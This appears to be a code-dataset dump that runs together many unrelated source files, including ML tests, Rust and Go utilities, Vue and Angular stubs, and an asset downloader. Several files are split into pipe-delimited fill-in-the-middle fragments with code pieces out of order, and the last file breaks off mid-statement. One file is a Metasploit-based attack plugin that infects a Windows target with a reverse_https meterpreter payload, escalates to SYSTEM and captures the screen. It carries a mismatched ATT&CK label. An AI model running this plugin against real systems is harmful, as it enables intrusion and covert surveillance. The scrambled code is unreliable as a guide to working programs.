helper_test_op([(45,65)], lambda x: (x+x)*x, lambda x: x.add(x).mul(x), atol=1e-6, grad_atol=1e-6)
def test_scalar_mul(self):
helper_test_op([(45,65)], lambda x: x*2, lambda x: x*2)
def test_scalar_rmul(self):
helper_test_op([(45,65)], lambda x: 2*x, lambda x: 2*x)
def test_scalar_sub(self):
helper_test_op([(45,65)], lambda x: x-2, lambda x: x-2)
def test_scalar_rsub(self):
helper_test_op([(45,65)], lambda x: 2-x, lambda x: 2-x)
def test_broadcast_full(self):
for torch_op, tinygrad_op in [(torch.add, Tensor.add), (torch.sub, Tensor.sub), (torch.mul, Tensor.mul),
(torch.div, Tensor.div), (torch.pow, Tensor.pow)]:
for shapes in [((5,13,24,16), (5,1,24,1)), ((1,3,1,7,1), (2,1,5,1,8))]:
with self.subTest(op=torch_op.__name__, shapes=shapes):
helper_test_op(shapes, torch_op, tinygrad_op, a=-0.5 if tinygrad_op != Tensor.pow else 0.0)
def test_broadcast_partial(self):
for torch_op, tinygrad_op in [(torch.add, Tensor.add), (torch.sub, Tensor.sub), (torch.mul, Tensor.mul),
(torch.div, Tensor.div), (torch.pow, Tensor.pow)]:
for shapes in [((1,32,32,32), (1,32,1,1)), ((5,13,24,16,2), (1,13,24,1,1)),
((4,1), (4,5)), ((1,4), (5,4))]:
with self.subTest(op=torch_op.__name__, shapes=shapes):
# NOTE: ANE backwards?
helper_test_op(shapes, torch_op, tinygrad_op, a=-0.5 if tinygrad_op != Tensor.pow else 0.0)
def test_slice(self):
helper_test_op([(3,3,3,3)], lambda x: x[1:2], lambda x: x[1:2])
helper_test_op([(3,3,3,3)], lambda x: x[1:2, 1:2], lambda x: x[1:2, 1:2])
helper_test_op([(3,3,3,3)], lambda x: x[1:2, 1:2, 0:-1], lambda x: x[1:2, 1:2, 0:-1])
def test_pad2d(self):
helper_test_op([(3,3,3,3)], lambda x: torch.nn.functional.pad(x, (1,2,3,4)), lambda x: x.pad2d(padding=(1,2,3,4)))
def test_transpose(self):
helper_test_op([(3,3,3)], lambda x: x.transpose(1,2), lambda x: x.transpose(order=(0,2,1)))
# This is failing on GPU because the dim is too large
#helper_test_op([(21,22,23,24)], lambda x: x.movedim((3,0,2,1),(0,1,2,3)), lambda x: x.transpose(order=(3,0,2,1)))
helper_test_op([(3,4,5,6)], lambda x: x.movedim((3,2,1,0),(0,1,2,3)), lambda x: x.transpose(order=(3,2,1,0)))
def test_reshape(self):
helper_test_op([(4,3,6,6)], lambda x: torch.reshape(x, (-1,3,6,6)), lambda x: x.reshape(shape=(-1,3,6,6)))
helper_test_op([(4,3,6,6)], lambda x: torch.reshape(x, (-1,1,6,6)), lambda x: x.reshape(shape=(-1,1,6,6)))
def test_detach(self):
helper_test_op([(4,3,6,6)], lambda x: x.detach(), lambda x: x.detach(), forward_only=True)
def test_conv2d(self):
for bs in [1,8]:
for cin in [1,3]:
for groups in [1,3] if cin == 3 else [1]:
for H in [1,2,5]:
for W in [1,2,3,5]:
with self.subTest(batch_size=bs, channels=cin, groups=groups, height=H, width=W):
helper_test_op([(bs,cin,11,28), (6,cin//groups,H,W)],
lambda x,w: torch.nn.functional.conv2d(x,w,groups=groups).relu(),
lambda x,w: Tensor.conv2d(x,w,groups=groups).relu(), atol=1e-4, grad_rtol=1e-5)
def test_strided_conv2d(self):
bs = 4
cin = 3
H,W = 3,3
with self.subTest(stride := 2):
helper_test_op([(bs,cin,11,28), (4,cin,H,W)],
lambda x,w: torch.nn.functional.conv2d(x,w,stride=2).relu(),
lambda x,w: Tensor.conv2d(x,w,stride=stride).relu(), atol=1e-4)
with self.subTest(stride := (2,1)):
helper_test_op([(bs,cin,11,28), (4,cin,H,W)],
lambda x,w: torch.nn.functional.conv2d(x,w,stride=stride).relu(),
lambda x,w: Tensor.conv2d(x,w,stride=(2,1)).relu(), atol=1e-4)
def test_maxpool2d(self):
for ksz in [(2,2), (3,3), (3,2), (5,5), (5,1)]:
with self.subTest(kernel_size=ksz):
helper_test_op([(32,2,110,28)],
lambda x: torch.nn.functional.max_pool2d(x, kernel_size=ksz),
# TODO: why is this tolerance so high?
lambda x: Tensor.max_pool2d(x, kernel_size=ksz), grad_atol=1e-4)
def test_avgpool2d(self):
shape = (32,2,111,28)
for ksz in [(2,2), (3,3), (3,2), (5,5), (5,1), shape[2:]]:
with self.subTest(kernel_size=ksz):
helper_test_op([shape],
lambda x: torch.nn.functional.avg_pool2d(x, kernel_size=ksz),
lambda x: Tensor.avg_pool2d(x, kernel_size=ksz), rtol=1e-5)
def test_upsample2d_nearest(self):
for sf in [1, 2, 3, 4, 5]:
with self.subTest(scale_factor=sf):
helper_test_op([(32,2,110,28)],
lambda x: torch.nn.functional.interpolate(x, scale_factor=sf, mode='nearest'),
lambda x: Tensor.upsample_nearest2d(x, scale_factor=sf), forward_only=True)
if __name__ == '__main__':
unittest.main(verbosity=2)
| test_div |
metasploit_screengrab.py | #!/usr/bin/env python3
# A plugin that uses Metasploit to grab a screenshot from a target
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitScreengrabPlugin(AttackPlugin):
# Boilerplate
| name = "metasploit_screengrab"
description = "Grab a screenshot"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
self.metasploit.screengrab(target)
return res |
|
main.rs | //! Run with
//!
//! ```not_rust
//! cargo run -p example-global-404-handler
//! ```
use axum::{
handler::{get, Handler},
http::StatusCode,
response::{Html, IntoResponse},
Router,
};
use std::net::SocketAddr;
#[tokio::main]
async fn main() {
// Set the RUST_LOG, if it hasn't been explicitly defined
if std::env::var_os("RUST_LOG").is_none() {
std::env::set_var("RUST_LOG", "example_global_404_handler=debug")
}
tracing_subscriber::fmt::init();
// build our application with a route
let app = Router::new().route("/", get(handler));
// make sure this is added as the very last thing
let app = app.or(handler_404.into_service());
// run it
let addr = SocketAddr::from(([127, 0, 0, 1], 3000));
tracing::debug!("listening on {}", addr);
axum::Server::bind(&addr)
.serve(app.into_make_service())
.await
.unwrap();
}
async fn handler() -> Html<&'static str> |
async fn handler_404() -> impl IntoResponse {
(StatusCode::NOT_FOUND, "nothing to see here")
}
| {
Html("<h1>Hello, World!</h1>")
} |
main.rs | use std::env;
mod ast;
mod executor;
mod parser;
mod scanner;
mod error;
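// Entry point: reads the source file named on the command line, scans it into
// tokens, parses the AST and executes it.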
fn | () {
let args: Vec<String> = env::args().collect();
if args.len() != 2 {
println!("Usage: {} [FILE]", args[0]);
return ();
}
let source_file = &args[1];
let source = std::fs::read_to_string(source_file).expect("Could not read file");
let mut scanner = scanner::Scanner::new(&source, "test");
let mut toks = vec![];
while let Some(tok) = scanner.scan_one() {
toks.push(tok);
}
let mut parser = parser::Parser::new(toks, &source, "test");
let ast = parser.parse();
let ast = ast
.into_iter()
.map(|sexpr| Box::new(ast::Expr::SExpr(*sexpr)))
.collect::<Vec<Box<ast::Expr>>>();
let astref = ast.iter().collect();
let mut executor = executor::Executor::new();
executor.execute(&astref);
}
| main |
test_0242.py | import pytest
from problems.problem_0242 import Solution
@pytest.mark.parametrize('test_input, expected', (
(('anagram', 'nagaram'), True),
(('rat', 'car'), False),
))
def test_is_anagram(test_input, expected):
| assert Solution.isAnagram(*test_input) == expected |
|
main.js | import 'animate.css'
import Vue from 'vue'
import App from './App.vue'
import Button from '@/widgets/button/element'
import Divider from '@/widgets/divider/element'
import Image from '@/widgets/image/element'
import Music from '@/widgets/music/element'
import Rect from '@/widgets/rect/element'
import Text from '@/widgets/text/element'
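// Register each widget element globally so templates can use them without local imports.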
Vue.component(Button.name, Button)
Vue.component(Divider.name, Divider) |
Vue.config.productionTip = false
new Vue({
render: h => h(App),
}).$mount('#app') | Vue.component(Image.name, Image)
Vue.component(Music.name, Music)
Vue.component(Rect.name, Rect)
Vue.component(Text.name, Text) |
target_lexicon.rs | //! Unstable non-standard Wasmer-specific API that contains everything
//! to create a target with a triple and CPU features.
//!
//! This is useful for cross-compilation.
//!
//! # Example
//!
//! ```rust
//! # use inline_c::assert_c;
//! # fn main() {
//! # (assert_c! {
//! # #include "tests/wasmer.h"
//! #
//! int main() {
//! // Declare the target triple.
//! wasmer_triple_t* triple;
//!
//! {
//! wasm_name_t triple_name;
//! wasm_name_new_from_string(&triple_name, "x86_64-apple-darwin");
//!
//! triple = wasmer_triple_new(&triple_name);
//!
//! wasm_name_delete(&triple_name);
//! }
//!
//! assert(triple);
//!
//! // Declare the target CPU features.
//! wasmer_cpu_features_t* cpu_features = wasmer_cpu_features_new();
//!
//! {
//! wasm_name_t cpu_feature_name;
//! wasm_name_new_from_string(&cpu_feature_name, "sse2");
//!
//! wasmer_cpu_features_add(cpu_features, &cpu_feature_name);
//!
//! wasm_name_delete(&cpu_feature_name);
//! }
//!
//! assert(cpu_features);
//!
//! // Create the target!
//! wasmer_target_t* target = wasmer_target_new(triple, cpu_features);
//! assert(target);
//!
//! wasmer_target_delete(target);
//!
//! return 0;
//! }
//! # })
//! # .success();
//! # }
//! ```
use super::super::types::wasm_name_t;
use crate::error::CApiError;
use enumset::EnumSet;
use std::slice;
use std::str::{self, FromStr};
use wasmer::{CpuFeature, Target, Triple};
/// Unstable non-standard Wasmer-specific API to represent a triple +
/// CPU features pair.
///
/// # Example
///
/// See the module's documentation.
#[derive(Debug)]
#[allow(non_camel_case_types)]
pub struct wasmer_target_t {
pub(crate) inner: Target,
}
/// Creates a new [`wasmer_target_t`].
///
/// It takes ownership of `triple` and `cpu_features`.
///
/// # Example
///
/// See the module's documentation.
#[no_mangle]
pub extern "C" fn wasmer_target_new(
triple: Option<Box<wasmer_triple_t>>,
cpu_features: Option<Box<wasmer_cpu_features_t>>,
) -> Option<Box<wasmer_target_t>> {
let triple = triple?;
let cpu_features = cpu_features?;
Some(Box::new(wasmer_target_t {
inner: Target::new(triple.inner.clone(), cpu_features.inner.clone()),
}))
}
/// Delete a [`wasmer_target_t`].
///
/// # Example
///
/// See the module's documentation.
#[no_mangle]
pub extern "C" fn wasmer_target_delete(_target: Option<Box<wasmer_target_t>>) {}
/// Unstable non-standard Wasmer-specific API to represent a target
/// “triple”.
///
/// Historically such things had three fields, though they have added
/// additional fields over time.
///
/// # Example
///
/// ```rust
/// # use inline_c::assert_c;
/// # fn main() {
/// # (assert_c! {
/// # #include "tests/wasmer.h"
/// #
/// int main() {
/// wasm_name_t triple_name;
/// wasm_name_new_from_string(&triple_name, "x86_64-apple-darwin");
///
/// wasmer_triple_t* triple = wasmer_triple_new(&triple_name);
/// assert(triple);
///
/// wasmer_triple_delete(triple);
/// wasm_name_delete(&triple_name);
///
/// return 0;
/// }
/// # })
/// # .success();
/// # }
/// ```
///
/// See also [`wasmer_triple_new_from_host`].
#[allow(non_camel_case_types)]
pub struct wasmer_triple_t {
inner: Triple,
}
/// Create a new [`wasmer_triple_t`] based on a triple string.
///
/// # Example
///
/// See [`wasmer_triple_t`] or [`wasmer_triple_new_from_host`].
#[no_mangle]
pub unsafe extern "C" fn wasm | triple: Option<&wasm_name_t>,
) -> Option<Box<wasmer_triple_t>> {
let triple = triple?;
let triple = c_try!(str::from_utf8(slice::from_raw_parts(
triple.data,
triple.size
)));
Some(Box::new(wasmer_triple_t {
inner: c_try!(Triple::from_str(triple).map_err(|e| CApiError { msg: e.to_string() })),
}))
}
/// Create the [`wasmer_triple_t`] for the current host.
///
/// # Example
///
/// ```rust
/// # use inline_c::assert_c;
/// # fn main() {
/// # (assert_c! {
/// # #include "tests/wasmer.h"
/// #
/// int main() {
/// wasmer_triple_t* triple = wasmer_triple_new_from_host();
/// assert(triple);
///
/// wasmer_triple_delete(triple);
///
/// return 0;
/// }
/// # })
/// # .success();
/// # }
/// ```
///
/// See also [`wasmer_triple_new`].
#[no_mangle]
pub extern "C" fn wasmer_triple_new_from_host() -> Box<wasmer_triple_t> {
Box::new(wasmer_triple_t {
inner: Triple::host(),
})
}
/// Delete a [`wasmer_triple_t`].
///
/// # Example
///
/// See [`wasmer_triple_t`].
#[no_mangle]
pub extern "C" fn wasmer_triple_delete(_triple: Option<Box<wasmer_triple_t>>) {}
/// Unstable non-standard Wasmer-specific API to represent a set of
/// CPU features.
///
/// CPU features are identified by their stringified names. The
/// reference is the GCC options:
///
/// * <https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html>,
/// * <https://gcc.gnu.org/onlinedocs/gcc/ARM-Options.html>,
/// * <https://gcc.gnu.org/onlinedocs/gcc/AArch64-Options.html>.
///
/// At the time of writing this documentation (it might be outdated in
/// the future), the supported features are the following:
///
/// * `sse2`,
/// * `sse3`,
/// * `ssse3`,
/// * `sse4.1`,
/// * `sse4.2`,
/// * `popcnt`,
/// * `avx`,
/// * `bmi`,
/// * `bmi2`,
/// * `avx2`,
/// * `avx512dq`,
/// * `avx512vl`,
/// * `lzcnt`.
///
/// # Example
///
/// ```rust
/// # use inline_c::assert_c;
/// # fn main() {
/// # (assert_c! {
/// # #include "tests/wasmer.h"
/// #
/// int main() {
/// // Create a new CPU feature set.
/// wasmer_cpu_features_t* cpu_features = wasmer_cpu_features_new();
///
/// // Create a new feature name, here `sse2`, and add it to the set.
/// {
/// wasm_name_t cpu_feature_name;
/// wasm_name_new_from_string(&cpu_feature_name, "sse2");
///
/// wasmer_cpu_features_add(cpu_features, &cpu_feature_name);
///
/// wasm_name_delete(&cpu_feature_name);
/// }
///
/// wasmer_cpu_features_delete(cpu_features);
///
/// return 0;
/// }
/// # })
/// # .success();
/// # }
/// ```
#[allow(non_camel_case_types)]
pub struct wasmer_cpu_features_t {
inner: EnumSet<CpuFeature>,
}
/// Create a new [`wasmer_cpu_features_t`].
///
/// # Example
///
/// See [`wasmer_cpu_features_t`].
#[no_mangle]
pub extern "C" fn wasmer_cpu_features_new() -> Box<wasmer_cpu_features_t> {
Box::new(wasmer_cpu_features_t {
inner: CpuFeature::set(),
})
}
/// Delete a [`wasmer_cpu_features_t`].
///
/// # Example
///
/// See [`wasmer_cpu_features_t`].
#[no_mangle]
pub extern "C" fn wasmer_cpu_features_delete(_cpu_features: Option<Box<wasmer_cpu_features_t>>) {}
/// Add a new CPU feature into the set represented by
/// [`wasmer_cpu_features_t`].
///
/// # Example
///
/// See [`wasmer_cpu_features_t`].
#[no_mangle]
pub unsafe extern "C" fn wasmer_cpu_features_add(
cpu_features: Option<&mut wasmer_cpu_features_t>,
feature: Option<&wasm_name_t>,
) -> bool {
let cpu_features = match cpu_features {
Some(cpu_features) => cpu_features,
_ => return false,
};
let feature = match feature {
Some(feature) => feature,
_ => return false,
};
let feature = c_try!(
str::from_utf8(slice::from_raw_parts(
feature.data,
feature.size,
));
otherwise false
);
cpu_features.inner.insert(c_try!(
CpuFeature::from_str(feature);
otherwise false
));
true
}
factory.js | /**
* @license
* Copyright 2012 Google Inc. All rights reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @fileoverview Generates packets from a ByteArray.
* @author [email protected] (Eduardo Vela)
*/
goog.provide('e2e.openpgp.packet.factory');
goog.require('e2e.openpgp.error.ParseError');
/**
* Dictionary of parsers for specific Packet types. The keys are the packet
* tags.
* @type {!Object.<number,
* function(!e2e.ByteArray):!e2e.openpgp.packet.Packet>}
* @private
*/
e2e.openpgp.packet.factory.parsers_ = {};
|
/**
* Registers a Packet as the default parser for a tag.
* @param {function(new:e2e.openpgp.packet.Packet, ...)} packet The
* constructor of the packet.
* @suppress {missingProperties} go/missingfnprops
*/
e2e.openpgp.packet.factory.add = function(packet) {
e2e.openpgp.packet.factory.parsers_[packet.prototype.tag] =
packet.parse;
};
/**
* Parses a packet of the given tag and returns it.
 * Throws an `e2e.openpgp.error.ParseError` when no parser is registered for the tag.
* @param {number} tag The tag to generate a packet for.
* @param {!e2e.ByteArray} body The body of the packet.
* @return {!e2e.openpgp.packet.Packet} The packet.
*/
e2e.openpgp.packet.factory.parse = function(tag, body) {
if (e2e.openpgp.packet.factory.parsers_.hasOwnProperty(tag)) {
return e2e.openpgp.packet.factory.parsers_[tag](body);
}
throw new e2e.openpgp.error.ParseError(
'Can not parse packet with tag ' + tag + '.');
}; | |
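// A minimal usage sketch (illustrative only; `SomePacket` stands in for any
// concrete packet class that defines `prototype.tag` and a static `parse(body)`,
// and `body` is assumed to be an e2e.ByteArray):
//
//   e2e.openpgp.packet.factory.add(SomePacket);
//   var packet = e2e.openpgp.packet.factory.parse(SomePacket.prototype.tag, body);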
maths.py |
import numpy as npy  # required below: the binning uses npy.linspace / npy.searchsorted / npy.sort

def bindata(data, maxbins = 30, reduction = 0.1):
    '''
    data must be a numeric list with a length above 20
    Bins the data into at most `maxbins` bins (roughly reduction*N bins, clamped to [2, maxbins])
    and returns the bin centres together with normalized densities, so the histogram
    integrates to 1 over the data range
'''
tole = 0.01
N = len(data)
assert N > 20
vmin = min(data)
vmax = max(data)
DV = vmax - vmin
tol = tole*DV
vmax += tol
if vmin >= 0:
vmin -= tol
vmin = max(0.0,vmin)
else:
vmin -= tol
n = min(maxbins,max(2,int(round(reduction*N))))
DV = vmax - vmin
bbin = npy.linspace(vmin,vmax,n+1)
sso = npy.searchsorted(bbin,npy.sort(data))
x = []
y = []
for i in range(0,n):
x.append(0.5*(bbin[i+1]+bbin[i]))
y.append(0.0)
dy = 1.0/N
for i in sso:
y[i-1] += dy/(bbin[i]-bbin[i-1])
return (x,y) |
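# A quick usage sketch (illustrative values): bin 100 random samples into at most
# 10 bins; `x` holds the bin centres and `y` the normalized densities, so
# sum(y[i] * bin_width) comes out to ~1.
#
#   import random
#   x, y = bindata([random.random() for _ in range(100)], maxbins=10)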
|
navbar.component.ts | import { Component } from '@angular/core';
/**
* This class represents the navigation bar component.
*/
@Component({
moduleId: module.id,
selector: 'sd-navbar',
templateUrl: 'navbar.component.html',
styleUrls: ['navbar.component.css'],
})
export class NavbarComponent { }
litconv.go | //Copyright 2013 Vastech SA (PTY) LTD
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package util
import (
"fmt"
"strconv"
"unicode"
"unicode/utf8"
)
/* Interface */
func LitToRune(lit []byte) rune {
if lit[1] == '\\' {
return escapeCharVal(lit)
}
r, size := utf8.DecodeRune(lit[1:])
if size != len(lit)-2 {
panic(fmt.Sprintf("Error decoding rune. Lit: %s, rune: %d, size%d\n", lit, r, size))
}
return r
}
func IntValue(lit []byte) (int64, error) {
return strconv.ParseInt(string(lit), 10, 64)
}
func UintValue(lit []byte) (uint64, error) {
return strconv.ParseUint(string(lit), 10, 64)
}
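// A minimal usage sketch (assuming this package is imported as "util"; the values
// shown are what the functions above return for these literals):
//
//	r := util.LitToRune([]byte(`'\n'`)) // r == '\n' (rune 10)
//	n, _ := util.IntValue([]byte("42")) // n == int64(42)
//	u, _ := util.UintValue([]byte("7")) // u == uint64(7)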
/* Util */
func escapeCharVal(lit []byte) rune {
	var i, base, max uint32
	offset := 2
	switch lit[offset] {
	case 'a':
		return '\a'
	case 'b':
		return '\b'
	case 'f':
		return '\f'
	case 'n':
		return '\n'
	case 'r':
		return '\r'
	case 't':
		return '\t'
	case 'v':
		return '\v'
	case '\\':
		return '\\'
	case '\'':
		return '\''
	case '0', '1', '2', '3', '4', '5', '6', '7':
		i, base, max = 3, 8, 255
	case 'x':
		i, base, max = 2, 16, 255
		offset++
	case 'u':
		i, base, max = 4, 16, unicode.MaxRune
		offset++
	case 'U':
		i, base, max = 8, 16, unicode.MaxRune
		offset++
	default:
		panic(fmt.Sprintf("Error decoding character literal: %s\n", lit))
	}
	var x uint32
	for ; i > 0 && offset < len(lit)-1; i-- {
		ch, size := utf8.DecodeRune(lit[offset:])
		offset += size
		d := uint32(digitVal(ch))
		if d >= base {
			panic(fmt.Sprintf("charVal(%s): illegal character (%c) in escape sequence. size=%d, offset=%d", lit, ch, size, offset))
		}
		x = x*base + d
	}
	if x > max || 0xD800 <= x && x < 0xE000 {
		panic(fmt.Sprintf("Error decoding escape char value. Lit:%s, offset:%d, escape sequence is invalid Unicode code point\n", lit, offset))
	}
	return rune(x)
}
func digitVal(ch rune) int {
switch {
case '0' <= ch && ch <= '9':
return int(ch) - '0'
case 'a' <= ch && ch <= 'f':
return int(ch) - 'a' + 10
case 'A' <= ch && ch <= 'F':
return int(ch) - 'A' + 10
}
return 16 // larger than any legal digit val
}
substance_assets_image_downloader.py | """
Downloads images for the assets scraped from https://substance3d.adobe.com/assets/allassets
and recorded in a local SQLite file
"""
import os
import time
import sys
import platform
from os import path
import requests # to get image from the web
import shutil # to save it locally
from rich import pretty
from rich.console import Console
from rich.traceback import install
from rich.progress import track
from common_database_access import CommonDatabaseAccess
import f_icon
from pathlib import Path
console = Console()
pretty.install()
install() # this is for tracing project activity
global_data = {"version": "Beta 1.2 (22.01.2022)\n"}
def clear_console():
"""Clears console view"""
command = "clear"
if os.name in ("nt", "dos"): # If Machine is running on Windows, use cls
command = "cls"
os.system(command)
def download_image(url, file_path):
if not path.exists(file_path):
r = requests.get(url, stream=True)
# Set decode_content value to True, otherwise the downloaded image file's size will be zero.
r.raw.decode_content = True
# Open a local file with wb ( write binary ) permission.
with open(file_path, "wb") as f:
shutil.copyfileobj(r.raw, f)
def append_date(filename):
"""adds date to the end of the filename
:param str filename: filename
:return:
"""
p = Path(filename)
return "{0}_{2}{1}".format(
Path.joinpath(p.parent, p.stem), p.suffix, time.strftime("%Y%m%d-%H%M%S")
)
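# For example (hypothetical timestamp), append_date("reports/out.txt") returns
# something like "reports/out_20220101-120000.txt".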
def check_for_download(url, file_path, need_to_refresh):
# console.print(url)
if url:
if os.path.exists(file_path) and need_to_refresh:
os.rename(file_path, append_date(file_path))
download_image(url, file_path)
def convert_to_nice_name(filename) -> str:
"""
Replaces _ with spaces in filename
:param str filename: filename to convert
:return:
"""
return filename.replace("_", " ")
def convert_to_ugly_name(filename) -> str:
"""
Replaces space with _ in filename
:param str filename: filename to convert
:return:
"""
return filename.replace(" ", "_")
def create_folder_for_type(database, asset_types):
# 1. create _source folder for files to move to their location
if not os.path.exists(
global_data["local_path"] + os.sep + global_data["source_path"]
):
os.makedirs(global_data["local_path"] + os.sep + global_data["source_path"])
# 2. Now creating rest of the folders
console.print("Creating folders ...")
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
os.makedirs(global_data["local_path"] + os.sep + a["name"])
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
os.makedirs(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
)
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if not os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
os.makedirs(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
)
input("Press any enter to close...")
def create_folders(database):
menu_title = " Select asset type to create folder"
count = 1
menu_items = []
all_asset_types = database.get_all_asset_types()
for asset_type in all_asset_types:
menu_items.append(f"[{count}] {asset_type['name']}")
count = count + 1
menu_items.append(f"[{count}] All")
count = count + 1
menu_items.append(f"[{count}] Return")
menu_exit = False
while not menu_exit:
# cls()
clear_console()
console.print("version " + global_data["version"])
console.print(menu_title + "")
for m_i in menu_items:
console.print(m_i + "")
console.print("")
user_input = input("Enter a number: ")
if user_input.isnumeric():
menu_sel = int(user_input)
if 1 <= menu_sel < count - 1: # Specific asset type
# categories = database.get_all_categories_by_asset_type_id(
# all_asset_types[menu_sel - 1]["id"]
# )
create_folder_for_type(database, [all_asset_types[menu_sel - 1]])
elif menu_sel == count - 1: # all asset types
# categories = database.get_all_categories_by_id(14)
# categories = database.get_all_categories()
create_folder_for_type(database, all_asset_types)
elif menu_sel == count: # Quit
menu_exit = True
def download_all_images(database):
console.print("Downloading images ...")
asset_types = database.get_all_asset_types()
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
# console.print(asset)
check_for_download(
asset["preview_image"],
local_path + "Preview.png",
asset["have_preview_image_changed"],
)
check_for_download(
asset["details_image"],
local_path + "Details.png",
asset["have_details_image_changed"],
)
check_for_download(
asset["variant_1_image"],
local_path + "Variant1.png",
asset["have_variant_1_image_changed"],
)
check_for_download(
asset["variant_2_image"],
local_path + "Variant2.png",
asset["have_variant_2_image_changed"],
)
check_for_download(
asset["variant_3_image"],
local_path + "Variant3.png",
asset["have_variant_3_image_changed"],
)
database.set_asset_art_as_updated(asset["id"])
input("Press any enter to close...")
def make_all_icons(database, ignore_created=True):
console.print("Creating folder icons ...")
asset_types = database.get_all_asset_types()
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
# console.print(asset)
if platform.system() == "Windows":
if os.path.exists(local_path + "Preview.png") and (
not os.path.exists(local_path + "Preview.ico")
or ignore_created
):
f_icon.create_icon(local_path + "Preview.png")
else:
if os.path.exists(local_path + "Preview.png"):
f_icon.create_icon(local_path + "Preview.png")
input("Press any enter to close...")
def transfer_all_local_files(database):
console.print("Placing files in corresponding folders ...")
files = os.listdir(global_data["local_path"] + os.sep + global_data["source_path"])
asset_types = database.get_all_asset_types()
placement_log = {"moved": [], "existing": [], "missing": [], "existing_full": []}
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
for (
f
) in (
files
): # going over all files in the _source folder that we know from the start
if os.path.exists( # checking, that file is still there. can be moved already
global_data["local_path"]
+ os.sep
+ global_data["source_path"]
+ os.sep
+ f
):
if not os.path.exists( # checking, that this file already exists at destination.
global_data[
"local_path"
] # if it is, then we have a double
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
):
if (
f.lower().endswith(".jpg")
and convert_to_nice_name(f.lower()).find(
asset["name"].lower()
)
>= 0
):
# if it is jpeg, then extra case. We check if asset name is inside file name
os.rename(
global_data["local_path"]
+ os.sep
+ global_data["source_path"]
+ os.sep
+ f,
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f,
)
placement_log["moved"].append(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
)
elif not f.lower().endswith(
".jpg"
): # if this is not a jpg, then we check name
# without extension to match with asset name
file_details = os.path.splitext(f)
if (
convert_to_nice_name(file_details[0].lower())
== asset["name"].lower()
):
os.rename(
global_data["local_path"]
+ os.sep
+ global_data["source_path"]
+ os.sep
+ f,
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f,
)
placement_log["moved"].append(
global_data["local_path"]
+ os.sep
+ a["name"]
